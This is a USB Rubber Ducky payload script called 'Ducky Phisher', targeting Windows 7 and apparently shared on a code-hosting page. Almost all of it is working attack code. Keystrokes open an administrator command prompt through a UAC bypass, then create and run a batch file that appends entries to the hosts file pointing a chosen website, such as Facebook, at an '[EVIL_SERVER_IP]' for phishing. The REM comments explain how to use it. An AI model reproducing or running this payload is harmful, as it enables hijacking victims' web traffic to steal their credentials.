50 lines
1.5 KiB
Plaintext
50 lines
1.5 KiB
Plaintext
Ducky Phisher
|
|
|
|
Author: Koryusai-Kun (Mad props to darren's UAC bypass code)
|
|
Duckencoder: 1.2
|
|
Target: Windows 7
|
|
Description: Used for phishing websites, read the REM in the code.
|
|
REM Author: .:Koryusai-Kun:.
|
|
REM Description: Used for phishing, it add's an ip of your choosing to the hosts file on windows
|
|
REM Description: so when the user types into there web browser for example www.facebook.com it
|
|
REM Description: insted of going to the proper ip it gose to the one in the host file your evil one.
|
|
REM Description: you need to add the www. version and with out it as well.
|
|
REM ---[Start CMD as administrator]-----------------------
|
|
GUI
|
|
DELAY 50
|
|
STRING cmd
|
|
DELAY 150
|
|
MENU
|
|
DELAY 75
|
|
STRING a
|
|
ENTER
|
|
DELAY 200
|
|
LEFT
|
|
ENTER
|
|
STRING cls
|
|
ENTER
|
|
REM ---[END]----------------------------------------------
|
|
DELAY 300
|
|
REM ---[Inject into the host file]------------------------
|
|
STRING copy con inject.bat
|
|
ENTER
|
|
STRING SET NEWLINE=^& echo.
|
|
ENTER
|
|
ENTER
|
|
STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts
|
|
ENTER
|
|
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts
|
|
ENTER
|
|
ENTER
|
|
STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts
|
|
ENTER
|
|
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts
|
|
ENTER
|
|
CONTROL z
|
|
ENTER
|
|
STRING inject.bat
|
|
ENTER
|
|
REM ---[END]----------------------------------------------
|
|
DELAY 200
|
|
STRING exit
|
|
ENTER |